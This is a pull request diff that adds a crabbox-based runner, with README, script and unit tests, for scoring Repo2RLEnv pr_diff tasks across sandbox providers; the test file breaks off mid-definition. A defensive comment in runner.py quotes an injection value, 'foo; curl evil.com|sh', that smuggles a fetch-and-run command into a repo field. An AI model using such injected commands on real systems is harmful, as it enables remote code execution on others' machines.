### PR TITLE
examples: crabbox runner for pr_diff tasks

### DIFF
--- a/examples/crabbox/README.md
+++ b/examples/crabbox/README.md
@@ -1,0 +1,132 @@
+# crabbox runner for pr_diff tasks
+
+Score Repo2RLEnv `pr_diff` tasks on any [crabbox](https://github.com/openclaw/crabbox)
+sandbox provider — local Docker, E2B, Modal, Daytona, islo.dev, Namespace
+Devbox, Tensorlake — selected by a single `--provider` flag.
+
+```sh
+python3 examples/crabbox/runner.py <task_dir>                          # default: islo
+python3 examples/crabbox/runner.py <task_dir> --provider local-container
+python3 examples/crabbox/runner.py --all <dataset_dir> -j 8            # batch + CSV
+```
+
+The runner extracts the embedded verifier out of `environment/Dockerfile`,
+stages it with the agent diff, runs `tests/test.sh` on the sandbox via
+crabbox, and parses `reward.json` out of stdout. Output: `reward.json`
+next to the task (single) or `rewards.csv` next to the dataset (batch).
+
+## Supported providers
+
+| `--provider`       | crabbox image flag we set | unit-tested | live-tested |
+|--------------------|---------------------------|:-:|:-:|
+| `local-container`  | `--local-container-image` | ✅ |   |
+| `docker`           | alias for `local-container` | ✅ |   |
+| `islo`             | `--islo-image`            | ✅ | ✅ |
+| `e2b`              | `--e2b-template`          | ✅ |   |
+| `modal`            | `--modal-image`           | ✅ |   |
+| `daytona`          | `--daytona-snapshot`      | ✅ |   |
+| `namespace-devbox` | `--namespace-image`       | ✅ |   |
+| `tensorlake`       | `--tensorlake-image`      | ✅ |   |
+
+Unsupported providers (`aws`, `azure`, `gcp`, `hetzner`, `proxmox`, `ssh`, …)
+need a pre-baked VM image with `python` + `git`; the wrapper raises a
+helpful `ValueError` listing the supported names rather than constructing
+a doomed `crabbox` invocation.
+
+## Prereqs
+
+```sh
+uv pip install repo2rlenv                           # this package
+# crabbox CLI: https://github.com/openclaw/crabbox#install
+# Plus auth for your chosen provider, e.g. `export ISLO_API_KEY=ak_...`
+```
+
+## Quickstart
+
+```sh
+# 1. Pull a published pr_diff dataset (or generate your own).
+repo2rlenv pull AdithyaSK/repo2rlenv-pr-diff ./datasets/pr-diff
+
+# 2. Oracle sanity check on the default provider (islo). Expect ~1.0.
+python3 examples/crabbox/runner.py ./datasets/pr-diff/pallets__click-3466
+
+# 3. Same task, local Docker — no cloud, no API key.
+python3 examples/crabbox/runner.py ./datasets/pr-diff/pallets__click-3466 \
+  --provider local-container
+
+# 4. Score a real agent's diff, capture reward locally.
+python3 examples/crabbox/runner.py ./datasets/pr-diff/pallets__click-3466 \
+  --agent-patch ./agent_predicted.diff \
+  --reward-out  ./agent_run.json
+
+# 5. Forward env vars (e.g. ANTHROPIC_API_KEY) so the verifier's LLM-judge
+#    component fires. --allow-env is repeatable.
+python3 examples/crabbox/runner.py <task_dir> --allow-env ANTHROPIC_API_KEY
+
+# 6. Whole dataset, parallel, CSV summary.
+python3 examples/crabbox/runner.py --all ./datasets/pr-diff -j 8
+```
+
+## How it works
+
+`pr_diff` tasks ship `environment/Dockerfile` with three verifier files
+(`oracle.patch`, `verifier.py`, `instruction.md`) inlined as base64-echo
+layers. Most providers (islo, e2b, …) are not docker-in-docker, so the
+runner:
+
+1. Parses `task.toml` (stdlib `tomllib`) for `repo`, `ref`, `pipeline`.
+2. Extracts the three `/verifier/` files locally from the Dockerfile.
+3. Stages them with the agent diff and `git init`s the dir (crabbox sync
+   expects a git checkout).
+4. Builds the right `crabbox run --provider <p> --<image-flag> python:3.12-slim
+   --<workdir-flag> task` for the requested provider (per-provider flag map
+   in `PROVIDER_CONFIG`).
+5. The remote bash script clones the repo at `<ref>`, applies the agent
+   diff (skipped if empty), runs `tests/test.sh` (with `/workspace`
+   rewritten to `/repo`), then emits a sentinel and `cat`s
+   `/logs/verifier/reward.json` over stdout.
+6. The host parses the reward.json off the subprocess pipe and writes it
+   to `reward.json`. Portable across every supported provider — islo's
+   delegate-exec mode means `crabbox --download` / `--capture-stdout`
+   don't work there, so stdout exfil is the lowest-common-denominator.
+
+Batch mode (`--all`) does the above in a `ThreadPoolExecutor`; each task
+gets its own sandbox lease.
+
+## Tests
+
+`tests/test_examples_crabbox.py` — 16 tests:
+
+- **15 unit tests** (run in CI, no network or binary required): parametrize
+  over every supported provider, monkeypatch `subprocess.run`, assert the
+  exact `crabbox` argv. Cover task.toml parsing, verifier extraction,
+  unknown-provider error, `--keep`, `--allow-env`, no-sentinel error path.
+- **1 live islo smoke** (gated on `ISLO_API_KEY` + `crabbox` on PATH):
+  pulls `pallets__click-3466`, scores the oracle, asserts
+  `final_reward == 1.0`. Trigger locally with:
+
+  ```sh
+  ISLO_API_KEY=ak_... uv run pytest tests/test_examples_crabbox.py \
+    -k live_islo -v
+  ```
+
+## Verified runs · live islo.dev sandbox, May 2026
+
+| task | mode | wall | `final_reward` |
+|---|---|---|---|
+| `pallets__click-3466` | single, oracle | ~51 s | **1.0** |
+| `pallets__click-3466` | single, empty diff | ~50 s | **0.0** |
+| 3 tasks (click ×2 + chalk) | batch `-j 3` | ~57 s | **1.0** each |
+
+## Scope
+
+- **Supported:** `pr_diff` — every task in
+  [`AdithyaSK/repo2rlenv-pr-diff`](https://huggingface.co/datasets/AdithyaSK/repo2rlenv-pr-diff)
+  (161 tasks).
+- **Not yet:** `pr_runtime`, `commit_runtime`, `cve_patches`, and the other
+  sandbox pipelines — they build a per-repo Docker image during
+  `repo2rlenv bootstrap` and expect docker-in-docker. Wiring those through
+  crabbox is a follow-up.
+- **Not a Harbor `--env` backend.** That belongs upstream in
+  [`harbor-framework/harbor`](https://github.com/harbor-framework/harbor),
+  not here.

--- a/examples/crabbox/crabbox.sh
+++ b/examples/crabbox/crabbox.sh
@@ -1,0 +1,4 @@
+#!/usr/bin/env bash
+# Thin shim around runner.py — the real implementation lives there.
+# See `python3 examples/crabbox/runner.py --help`.
+exec python3 "$(dirname "$0")/runner.py" "$@"

--- a/examples/crabbox/runner.py
+++ b/examples/crabbox/runner.py
@@ -1,0 +1,398 @@
+"""Score Repo2RLEnv pr_diff tasks on any crabbox sandbox provider.
+
+Supported via ``--provider``: local-container (docker), islo, e2b, modal,
+daytona, namespace-devbox, tensorlake. Default is islo. VM providers
+(aws, azure, gcp, hetzner, proxmox, ssh) need a pre-baked image and are
+rejected with a helpful error.
+
+    # Single task — writes reward.json next to it on success.
+    python runner.py <task_dir>
+
+    # Whole pulled dataset — writes a rewards.csv summary.
+    python runner.py --all <dataset_dir> -j 8
+
+The verifier inside the task writes /logs/verifier/reward.json; the
+remote script emits a sentinel and ``cat``s that file over stdout, which
+the host parses from the subprocess pipe. Portable across every supported
+provider (islo's delegate-exec mode means ``crabbox --download`` /
+``--capture-stdout`` don't work there, so stdout exfil is the lowest-
+common-denominator).
+"""
+
+from __future__ import annotations
+
+import argparse
+import base64
+import concurrent.futures
+import csv
+import json
+import os
+import re
+import shutil
+import subprocess
+import sys
+import tempfile
+import tomllib
+from dataclasses import dataclass
+from pathlib import Path
+
+VERIFIER_LINE = re.compile(r'echo "([A-Za-z0-9+/=]+)" \| base64 -d > /verifier/(\S+)')
+
+REWARD_SENTINEL = "===R2RE-REWARD-JSON==="
+
+# Per-provider flag map. The provider's flag names are NOT consistent
+# across crabbox: islo/modal/local-container/namespace-devbox/tensorlake
+# expose `--<p>-image`, e2b uses `--e2b-template`, daytona uses
+# `--daytona-snapshot`. Workdir flags drift similarly. Keep this table
+# explicit rather than guessing from the provider name.
+#
+# Only provider families that accept a container-like image and a workdir
+# are listed — they're the ones whose semantics line up with pr_diff's
+# "ship a script, return reward.json" pattern. VM providers (aws, azure,
+# gcp, hetzner, proxmox, ssh, ...) need a pre-baked AMI with python+git
+# ready; supporting them is a separate, larger lift.
+PROVIDER_CONFIG: dict[str, dict[str, str]] = {
+    "islo": {"image_flag": "--islo-image", "workdir_flag": "--islo-workdir"},
+    "e2b": {"image_flag": "--e2b-template", "workdir_flag": "--e2b-workdir"},
+    "modal": {"image_flag": "--modal-image", "workdir_flag": "--modal-workdir"},
+    "daytona": {
+        "image_flag": "--daytona-snapshot",
+        "workdir_flag": "--daytona-work-root",
+    },
+    "local-container": {
+        "image_flag": "--local-container-image",
+        "workdir_flag": "--local-container-work-root",
+    },
+    # Common alias for local-container.
+    "docker": {
+        "image_flag": "--local-container-image",
+        "workdir_flag": "--local-container-work-root",
+    },
+    "namespace-devbox": {
+        "image_flag": "--namespace-image",
+        "workdir_flag": "--namespace-work-root",
+    },
+    "tensorlake": {
+        "image_flag": "--tensorlake-image",
+        "workdir_flag": "--tensorlake-workdir",
+    },
+}
+
+
+def _provider_flags(provider: str) -> dict[str, str]:
+    if provider not in PROVIDER_CONFIG:
+        supported = ", ".join(sorted(PROVIDER_CONFIG))
+        raise ValueError(
+            f"provider {provider!r} not supported by this example. "
+            f"Container-style providers: {supported}. "
+            f"For VM providers (aws, azure, gcp, hetzner, proxmox, ssh) the "
+            f"sandbox needs a pre-baked image with python+git; not handled here."
+        )
+    return PROVIDER_CONFIG[provider]
+
+
+# task.repo and task.ref come from task.toml — a third-party file. They are
+# passed as POSITIONAL ARGUMENTS to bash, not interpolated into the script
+# body, so a malicious value like repo='foo; curl evil.com|sh' cannot escape
+# its variable expansion. ``"$1"`` / ``"$2"`` quoting in the script keeps
+# them inert even with spaces, semicolons, backticks, or $().
+REMOTE_SCRIPT = f"""\
+set -euo pipefail
+repo="$1"
+ref="$2"
+apt-get update -qq && apt-get install -y -qq git ca-certificates >/dev/null
+git config --global --add safe.directory '*'
+git config --global advice.detachedHead false
+git clone --filter=blob:none "https://github.com/${{repo}}.git" /repo >&2
+cd /repo
+( git fetch --depth 1 origin "${{ref}}" || git fetch --unshallow origin ) >&2 2>&1
+git reset --hard "${{ref}}" >&2
+# An empty agent.diff means "agent gave up" — score it (expected ~baseline).
+if [ -s /workspace/task/agent.diff ]; then
+  git apply --whitespace=nowarn /workspace/task/agent.diff >&2
+fi
+mkdir -p /verifier && cp /workspace/task/verifier/* /verifier/
+mkdir -p /logs/verifier
+# test.sh hardcodes /workspace as the repo root; rewrite to /repo so it does
+# not collide with islo's /workspace sync mount. The sed only matches the
+# whole-token path (\\b/workspace\\b), not strings that merely contain it.
+sed -E 's#(^|[^A-Za-z0-9_/])/workspace([^A-Za-z0-9_]|$)#\\1/repo\\2#g' \\
+    /workspace/task/test.sh > /tmp/test.sh
+bash /tmp/test.sh >&2
+# Exfiltrate reward.json over stdout — islo doesn't support crabbox --download.
+echo '{REWARD_SENTINEL}'
+cat /logs/verifier/reward.json
+"""
+
+
+@dataclass(frozen=True)
+class Task:
+    path: Path
+    name: str
+    repo: str
+    ref: str
+    pipeline: str
+    image_ref: str
+
+    @classmethod
+    def load(cls, task_dir: Path) -> Task:
+        data = tomllib.loads((task_dir / "task.toml").read_text())
+        meta = data["metadata"]["repo2env"]
+        repro = meta.get("reproducibility", {})
+        return cls(
+            path=task_dir,
+            name=data["task"]["name"],
+            repo=meta["repo"],
+            ref=meta["ref"],
+            pipeline=meta["pipeline"],
+            image_ref=repro.get("image_ref", "python:3.12-slim"),
+        )
+
+
+def _extract_verifier(dockerfile: Path) -> dict[str, bytes]:
+    """Recover the base64-embedded /verifier/ files from a pr_diff Dockerfile."""
+    return {
+        m.group(2): base64.b64decode(m.group(1))
+        for m in VERIFIER_LINE.finditer(dockerfile.read_text())
+    }
+
+
+def _stage(task: Task, agent_patch: Path) -> Path:
+    """Build the temp dir crabbox will sync to the sandbox."""
+    stage = Path(tempfile.mkdtemp(prefix="crabbox-r2re-"))
+    (stage / "verifier").mkdir()
+    files = _extract_verifier(task.path / "environment" / "Dockerfile")
+    if not files:
+        raise RuntimeError(
+            f"no /verifier/ files in {task.path}/environment/Dockerfile — "
+            f"this wrapper currently supports pr_diff tasks only "
+            f"(pipeline={task.pipeline!r})."
+        )
+    for name, data in files.items():
+        (stage / "verifier" / name).write_bytes(data)
+    shutil.copy(task.path / "tests" / "test.sh", stage / "test.sh")
+    shutil.copy(agent_patch, stage / "agent.diff")
+
+    # crabbox syncs from a git checkout. Inherit the parent env (so git is
+    # findable on macOS Homebrew at /opt/homebrew/bin, etc.) and overlay the
+    # commit identity. Earlier versions stripped PATH on the `git add` call
+    # and broke on every non-Linux host.
+    git_env = {
+        **os.environ,
+        "GIT_AUTHOR_EMAIL": "crabbox@local",
+        "GIT_AUTHOR_NAME": "crabbox",
+        "GIT_COMMITTER_EMAIL": "crabbox@local",
+        "GIT_COMMITTER_NAME": "crabbox",
+    }
+    subprocess.run(["git", "init", "-q", "-b", "main"], cwd=stage, check=True, env=git_env)
+    subprocess.run(["git", "add", "-A"], cwd=stage, check=True, env=git_env)
+    subprocess.run(["git", "commit", "-q", "-m", "stage"], cwd=stage, check=True, env=git_env)
+    return stage
+
+
+def _preflight(task_dir: Path, agent_patch: Path, provider: str) -> None:
+    """Fail fast with actionable errors before we stage anything or call crabbox."""
+    for name in ("task.toml", "environment/Dockerfile", "tests/test.sh"):
+        if not (task_dir / name).is_file():
+            raise FileNotFoundError(
+                f"missing {task_dir / name} — not a Repo2RLEnv pr_diff task directory"
+            )
+    if not agent_patch.is_file():
+        raise FileNotFoundError(
+            f"agent patch not found: {agent_patch}. Pass --agent-patch to override "
+            f"the default of <task>/solution/patch.diff."
+        )
+    if shutil.which("crabbox") is None:
+        raise RuntimeError(
+            "crabbox CLI not on PATH — install from https://github.com/openclaw/crabbox"
+        )
+    if provider == "islo" and not os.environ.get("ISLO_API_KEY"):
+        raise RuntimeError(
+            "ISLO_API_KEY is not set — `islo api-key create <name> --show` to mint one, "
+            "then `export ISLO_API_KEY=ak_...`."
+        )
+
+
+def run_task(
+    task_dir: Path,
+    *,
+    agent_patch: Path | None = None,
+    provider: str = "islo",
+    image: str | None = None,
+    reward_out: Path | None = None,
+    keep: bool = False,
+    quiet: bool = False,
+    allow_env: list[str] | None = None,
+) -> dict:
+    task = Task.load(task_dir)
+    agent_patch = agent_patch or (task_dir / "solution" / "patch.diff")
+    # Honor the task's recorded image_ref unless the caller overrides it
+    # explicitly. Tasks pin their toolchain (e.g. python:3.12-slim for
+    # pr_diff, a bootstrap image for pr_runtime); silently swapping in
+    # python:3.12-slim regardless was a real correctness bug.
+    image = image or task.image_ref or "python:3.12-slim"
+    reward_out = (reward_out or (task_dir / "reward.json")).resolve()
+    _preflight(task_dir, agent_patch, provider)
+    if reward_out.is_dir():
+        raise IsADirectoryError(f"--reward-out must be a file path, not a directory: {reward_out}")
+    if reward_out.exists():
+        reward_out.unlink()
+    reward_out.parent.mkdir(parents=True, exist_ok=True)
+
+    flags = _provider_flags(provider)
+    stage = _stage(task, agent_patch)
+    try:
+        cmd = [
+            "crabbox",
+            "run",
+            "--provider",
+            provider,
+            flags["image_flag"],
+            image,
+            flags["workdir_flag"],
+            "task",
+        ]
+        for var in allow_env or []:
+            cmd += ["--allow-env", var]
+        if keep:
+            cmd.append("--keep")
+        # task.repo / task.ref are PASSED AS ARGS to bash, never interpolated
+        # into the script body. A poisoned task.toml cannot escape "$1"/"$2".
+        cmd += ["--", "bash", "-lc", REMOTE_SCRIPT, "_", task.repo, task.ref]
+
+        if not quiet:
+            print(
+                f"[crabbox] {task.name} provider={provider} image={image}",
+                file=sys.stderr,
+            )
+        # islo delegates exec, so crabbox --download / --capture-stdout aren't
+        # supported. We exfiltrate reward.json over stdout (after a sentinel)
+        # and read it from the subprocess pipe here.
+        proc = subprocess.run(
+            cmd,
+            cwd=stage,
+            stdout=subprocess.PIPE,
+            stderr=subprocess.DEVNULL if quiet else None,
+            text=True,
+        )
+        captured = proc.stdout or ""
+    finally:
+        shutil.rmtree(stage, ignore_errors=True)
+
+    _, _, tail = captured.partition(REWARD_SENTINEL)
+    payload = tail.strip()
+    if proc.returncode != 0 or not payload:
+        raise RuntimeError(f"crabbox exited {proc.returncode}; no reward payload found in stdout")
+    try:
+        reward = json.loads(payload)
+    except json.JSONDecodeError as e:
+        raise RuntimeError(f"reward payload not JSON: {payload[:200]!r}") from e
+    reward_out.write_text(json.dumps(reward, indent=2) + "\n")
+    return reward
+
+
+def run_dataset(
+    dataset_dir: Path,
+    *,
+    jobs: int = 4,
+    csv_out: Path | None = None,
+    **kw,
+) -> list[dict]:
+    csv_out = csv_out or (dataset_dir / "rewards.csv")
+    task_dirs = sorted(p for p in dataset_dir.iterdir() if (p / "task.toml").exists())
+    if not task_dirs:
+        raise RuntimeError(f"no task.toml files under {dataset_dir}")
+    print(
+        f"[batch] {len(task_dirs)} tasks; j={jobs}; provider={kw.get('provider', 'islo')}",
+        file=sys.stderr,
+    )
+
+    def _one(t: Path) -> dict:
+        try:
+            r = run_task(t, quiet=True, **kw)
+            r["task"] = t.name
+            r["status"] = "ok"
+        except Exception as e:
+            r = {"task": t.name, "status": "error", "error": str(e), "final_reward": None}
+        print(
+            f"[batch] {r['task']:50s} reward={r.get('final_reward')!s:>6}  {r['status']}",
+            file=sys.stderr,
+        )
+        return r
+
+    rows: list[dict] = []
+    with concurrent.futures.ThreadPoolExecutor(max_workers=jobs) as ex:
+        for r in ex.map(_one, task_dirs):
+            rows.append(r)
+
+    with csv_out.open("w", newline="") as f:
+        w = csv.writer(f)
+        w.writerow(["task", "final_reward", "status"])
+        for r in rows:
+            w.writerow([r["task"], r.get("final_reward"), r["status"]])
+    print(f"[batch] wrote {csv_out}", file=sys.stderr)
+    return rows
+
+
+def main(argv: list[str] | None = None) -> int:
+    p = argparse.ArgumentParser(
+        description=(__doc__ or "").splitlines()[0],
+        formatter_class=argparse.RawDescriptionHelpFormatter,
+        epilog="See examples/crabbox/README.md for the full walkthrough.",
+    )
+    p.add_argument("target", help="task dir, OR dataset dir when --all is set")
+    p.add_argument(
+        "--all", action="store_true", help="treat <target> as a dataset directory of tasks"
+    )
+    p.add_argument(
+        "--agent-patch",
+        type=Path,
+        help="agent's unified diff (default: <task>/solution/patch.diff, "
+        "i.e. the oracle — sanity check that should score ~1.0)",
+    )
+    p.add_argument("--provider", default="islo", help="crabbox provider (default: islo)")
+    p.add_argument("--image", help="sandbox base image (default: python:3.12-slim)")
+    p.add_argument(
+        "--reward-out",
+        type=Path,
+        help="single-task: where to write reward.json (default: <task>/reward.json)",
+    )
+    p.add_argument(
+        "--csv-out",
+        type=Path,
+        help="batch: where to write rewards.csv (default: <dataset>/rewards.csv)",
+    )
+    p.add_argument("-j", "--jobs", type=int, default=4, help="batch parallelism (default: 4)")
+    p.add_argument("--keep", action="store_true", help="don't release the sandbox after the run")
+    p.add_argument(
+        "--allow-env",
+        action="append",
+        default=[],
+        metavar="VAR",
+        help="forward a local env var to the sandbox (repeatable); e.g. "
+        "--allow-env ANTHROPIC_API_KEY enables the verifier's LLM-judge component",
+    )
+    args = p.parse_args(argv)
+
+    target = Path(args.target).resolve()
+    common = dict(
+        provider=args.provider, image=args.image, keep=args.keep, allow_env=args.allow_env
+    )
+
+    if args.all:
+        if not target.is_dir():
+            p.error(f"--all expects a dataset directory; got {target}")
+        run_dataset(target, jobs=args.jobs, csv_out=args.csv_out, **common)
+    else:
+        if not (target / "task.toml").exists():
+            p.error(f"not a task directory (no task.toml): {target}")
+        result = run_task(
+            target, agent_patch=args.agent_patch, reward_out=args.reward_out, **common
+        )
+        json.dump(result, sys.stdout, indent=2)
+        print()
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())

--- a/tests/test_examples_crabbox.py
+++ b/tests/test_examples_crabbox.py
@@ -1,0 +1,329 @@
+"""Tests for ``examples/crabbox/runner.py``.
+
+Two layers:
+
+1. **Unit tests** (always run in CI): assert the right ``crabbox run``
+   command line is built for every supported provider, plus
+   task.toml / Dockerfile parsing. ``subprocess.run`` is monkeypatched
+   so no network or external binary is required.
+
+2. **Live islo smoke** (gated): runs only when ``ISLO_API_KEY`` is set
+   *and* ``crabbox`` is on PATH. Pulls a single ``pr_diff`` task from
+   the public reference dataset, scores the oracle diff, asserts
+   ``final_reward == 1.0``. Skipped in CI by default.
+"""
+
+from __future__ import annotations
+
+import base64
+import importlib.util
+import json
+import os
+import shutil
+import subprocess
+import sys
+from pathlib import Path
+from types import SimpleNamespace
+
+import pytest
+
+EXAMPLES_DIR = Path(__file__).parent.parent / "examples" / "crabbox"
+
+
+def _load_runner():
+    """Load ``examples/crabbox/runner.py`` as a module without packaging it."""
+    spec = importlib.util.spec_from_file_location("crabbox_runner", EXAMPLES_DIR / "runner.py")
+    assert spec and spec.loader
+    mod = importlib.util.module_from_spec(spec)
+    sys.modules["crabbox_runner"] = mod
+    spec.loader.exec_module(mod)
+    return mod
+
+
+runner = _load_runner()
+
+
+# ─── unit tests ────────────────────────────────────────────────────────────────
+
+
+def test_provider_config_covers_known_container_providers():
+    """The PROVIDER_CONFIG table is the contract — guard regressions."""
+    expected = {
+        "islo",
+        "e2b",
+        "modal",
+        "daytona",
+        "local-container",
+        "docker",
+        "namespace-devbox",
+        "tensorlake",
+    }
+    assert expected <= set(runner.PROVIDER_CONFIG)
+    for name, cfg in runner.PROVIDER_CONFIG.items():
+        assert cfg["image_flag"].startswith("--"), name
+        assert cfg["workdir_flag"].startswith("--"), name
+
+
+def test_unsupported_provider_raises_with_helpful_message():
+    with pytest.raises(ValueError) as exc_info:
+        runner._provider_flags("aws")
+    msg = str(exc_info.value)
+    assert "aws" in msg
+    assert "islo" in msg  # supported providers should be enumerated
+    assert "VM providers" in msg  # explains why VMs aren't here
+
+
+def _make_fake_task(tmp_path: Path) -> Path:
+    """Build a minimal pr_diff task tree that satisfies the loader."""
+    task_dir = tmp_path / "owner__repo-1"
+    (task_dir / "environment").mkdir(parents=True)
+    (task_dir / "tests").mkdir()
+    (task_dir / "solution").mkdir()
+
+    (task_dir / "task.toml").write_text(
+        """
+version = "1.0"
+[task]
+name = "default/owner__repo-1"
+description = "test fixture"
+[metadata]
+[metadata.repo2env]
+pipeline = "pr_diff"
+repo = "owner/repo"
+ref = "deadbeefcafe1234"
+reference = "https://github.com/owner/repo/pull/1"
+source_access = "auto"
+reward_kinds = ["diff_similarity_multi_component"]
+spec_version = "0.2.0"
+[metadata.repo2env.reproducibility]
+mode = "local_only"
+image_ref = "python:3.12-slim"
+""".strip()
+    )
+
+    oracle_b64 = base64.b64encode(b"diff --oracle--").decode()
+    instr_b64 = base64.b64encode(b"do the thing").decode()
+    verifier_b64 = base64.b64encode(b"#!/usr/bin/env python3\nprint('{}')\n").decode()
+    (task_dir / "environment" / "Dockerfile").write_text(
+        "FROM python:3.12-slim\n"
+        "RUN mkdir -p /verifier\n"
+        f'RUN echo "{oracle_b64}" | base64 -d > /verifier/oracle.patch\n'
+        f'RUN echo "{instr_b64}" | base64 -d > /verifier/instruction.md\n'
+        f'RUN echo "{verifier_b64}" | base64 -d > /verifier/verifier.py\n'
+    )
+    (task_dir / "tests" / "test.sh").write_text("#!/bin/bash\nset -e\necho 'fake test.sh ran'\n")
+    (task_dir / "solution" / "patch.diff").write_text("diff --oracle--")
+    return task_dir
+
+
+def test_task_load_extracts_metadata(tmp_path):
+    task = runner.Task.load(_make_fake_task(tmp_path))
+    assert task.repo == "owner/repo"
+    assert task.ref == "deadbeefcafe1234"
+    assert task.pipeline == "pr_diff"
+    assert task.image_ref == "python:3.12-slim"
+    assert task.name == "default/owner__repo-1"
+
+
+def test_extract_verifier_recovers_three_files(tmp_path):
+    task_dir = _make_fake_task(tmp_path)
+    out = runner._extract_verifier(task_dir / "environment" / "Dockerfile")
+    assert set(out) == {"oracle.patch", "instruction.md", "verifier.py"}
+    assert out["oracle.patch"] == b"diff --oracle--"
+
+
+@pytest.fixture
+def fake_subprocess(monkeypatch):
+    """Capture every subprocess.run call; the last one is the crabbox invocation.
+
+    Also pre-satisfies ``_preflight``: stubs ``shutil.which('crabbox')`` to a
+    fake path and exports a placeholder ``ISLO_API_KEY`` so the runner's
+    fail-fast guards don't trip on test hosts that lack either.
+    """
+    calls: list[SimpleNamespace] = []
+
+    real_run = subprocess.run
+
+    def _fake_run(cmd, *args, **kwargs):
+        calls.append(SimpleNamespace(cmd=list(cmd), kwargs=dict(kwargs)))
+        # Git invocations during _stage actually need to succeed; defer to real.
+        if isinstance(cmd, list) and cmd and cmd[0] == "git":
+            return real_run(cmd, *args, **kwargs)
+        # crabbox: emit a fake stdout that contains the sentinel + a reward.json.
+        reward = json.dumps({"final_reward": 0.42, "components": {}})
+        stdout = f"some log lines\n{runner.REWARD_SENTINEL}\n{reward}\n"
+        return SimpleNamespace(returncode=0, stdout=stdout, stderr=None)
+
+    monkeypatch.setattr(subprocess, "run", _fake_run)
+    monkeypatch.setattr(runner.subprocess, "run", _fake_run)
+    monkeypatch.setattr(runner.shutil, "which", lambda name: "/fake/bin/crabbox")
+    monkeypatch.setenv("ISLO_API_KEY", "ak_test_placeholder")
+    return calls
+
+
+@pytest.mark.parametrize(
+    "provider,image_flag,workdir_flag",
+    [
+        ("islo", "--islo-image", "--islo-workdir"),
+        ("e2b", "--e2b-template", "--e2b-workdir"),
+        ("modal", "--modal-image", "--modal-workdir"),
+        ("daytona", "--daytona-snapshot", "--daytona-work-root"),
+        (
+            "local-container",
+            "--local-container-image",
+            "--local-container-work-root",
+        ),
+        ("docker", "--local-container-image", "--local-container-work-root"),
+        ("namespace-devbox", "--namespace-image", "--namespace-work-root"),
+        ("tensorlake", "--tensorlake-image", "--tensorlake-workdir"),
+    ],
+)
+def test_run_task_builds_correct_command_for_each_provider(
+    tmp_path, fake_subprocess, provider, image_flag, workdir_flag
+):
+    task_dir = _make_fake_task(tmp_path)
+    result = runner.run_task(task_dir, provider=provider, image="my-image:tag", quiet=True)
+    crabbox_call = next(c for c in fake_subprocess if c.cmd and c.cmd[0] == "crabbox")
+    argv = crabbox_call.cmd
+    assert argv[:4] == ["crabbox", "run", "--provider", provider]
+    assert image_flag in argv
+    assert argv[argv.index(image_flag) + 1] == "my-image:tag"
+    assert workdir_flag in argv
+    assert argv[argv.index(workdir_flag) + 1] == "task"
+    assert result["final_reward"] == 0.42
+    # The wrapper should have written reward.json next to the task.
+    written = json.loads((task_dir / "reward.json").read_text())
+    assert written["final_reward"] == 0.42
+
+
+def test_run_task_rejects_unsupported_provider(tmp_path, fake_subprocess):
+    with pytest.raises(ValueError, match="not supported"):
+        runner.run_task(_make_fake_task(tmp_path), provider="aws", quiet=True)
+
+
+def test_run_task_writes_keep_flag_when_requested(tmp_path, fake_subprocess):
+    runner.run_task(_make_fake_task(tmp_path), keep=True, quiet=True)
+    crabbox_call = next(c for c in fake_subprocess if c.cmd and c.cmd[0] == "crabbox")
+    assert "--keep" in crabbox_call.cmd
+
+
+def test_run_task_forwards_allow_env_vars(tmp_path, fake_subprocess):
+    runner.run_task(
+        _make_fake_task(tmp_path),
+        allow_env=["ANTHROPIC_API_KEY", "OPENAI_API_KEY"],
+        quiet=True,
+    )
+    argv = next(c for c in fake_subprocess if c.cmd and c.cmd[0] == "crabbox").cmd
+    # Each --allow-env should appear immediately followed by its var name.
+    flags = [(argv[i], argv[i + 1]) for i, a in enumerate(argv) if a == "--allow-env"]
+    assert ("--allow-env", "ANTHROPIC_API_KEY") in flags
+    assert ("--allow-env", "OPENAI_API_KEY") in flags
+
+
+def test_run_task_raises_when_no_sentinel_in_stdout(tmp_path, monkeypatch):
+    """If the remote script crashed before printing the sentinel, surface it."""
+    real_run = subprocess.run
+
+    def _no_sentinel(cmd, *args, **kwargs):
+        if isinstance(cmd, list) and cmd and cmd[0] == "git":
+            return real_run(cmd, *args, **kwargs)
+        return SimpleNamespace(returncode=1, stdout="boom\n", stderr=None)
+
+    monkeypatch.setattr(subprocess, "run", _no_sentinel)
+    monkeypatch.setattr(runner.subprocess, "run", _no_sentinel)
+    monkeypatch.setattr(runner.shutil, "which", lambda name: "/fake/bin/crabbox")
+    monkeypatch.setenv("ISLO_API_KEY", "ak_test_placeholder")
+    with pytest.raises(RuntimeError, match="no reward payload"):
+        runner.run_task(_make_fake_task(tmp_path), quiet=True)
+
+
+def test_preflight_rejects_missing_crabbox(tmp_path, monkeypatch):
+    monkeypatch.setattr(runner.shutil, "which", lambda name: None)
+    monkeypatch.setenv("ISLO_API_KEY", "ak_test_placeholder")
+    with pytest.raises(RuntimeError, match="crabbox CLI not on PATH"):
+        runner.run_task(_make_fake_task(tmp_path), quiet=True)
+
+
+def test_preflight_rejects_missing_islo_key(tmp_path, monkeypatch):
+    monkeypatch.setattr(runner.shutil, "which", lambda name: "/fake/bin/crabbox")
+    monkeypatch.delenv("ISLO_API_KEY", raising=False)
+    with pytest.raises(RuntimeError, match="ISLO_API_KEY is not set"):
+        runner.run_task(_make_fake_task(tmp_path), quiet=True)
+
+
+def test_preflight_rejects_missing_task_files(tmp_path, monkeypatch):
+    monkeypatch.setattr(runner.shutil, "which", lambda name: "/fake/bin/crabbox")
+    monkeypatch.setenv("ISLO_API_KEY", "ak_test_placeholder")
+    task_dir = _make_fake_task(tmp_path)
+    (task_dir / "tests" / "test.sh").unlink()
+    with pytest.raises(FileNotFoundError, match=r"test\.sh"):
+        runner.run_task(task_dir, quiet=True)
+
+
+def test_run_task_honors_task_image_ref_by_default(tmp_path, fake_subprocess):
+    """A task that pins reproducibility.image_ref should run on that image,
+    not the hardcoded python:3.12-slim — that was a silent correctness bug."""
+    task_dir = _make_fake_task(tmp_path)
+    # Patch the task to declare a non-python base image.
+    toml = (task_dir / "task.toml").read_text()
+    toml = toml.replace('image_ref = "python:3.12-slim"', 'image_ref = "node:20-alpine"')
+    (task_dir / "task.toml").write_text(toml)
+    runner.run_task(task_dir, quiet=True)  # no --image override
+    argv = next(c for c in fake_subprocess if c.cmd and c.cmd[0] == "crabbox").cmd
+    # --islo-image (the default provider) should point at the task's declared image.
+    assert argv[argv.index("--islo-image") + 1] == "node:20-alpine"
+
+
+def test_run_task_passes_repo_and_ref_as_positional_args(tmp_path, fake_subprocess):
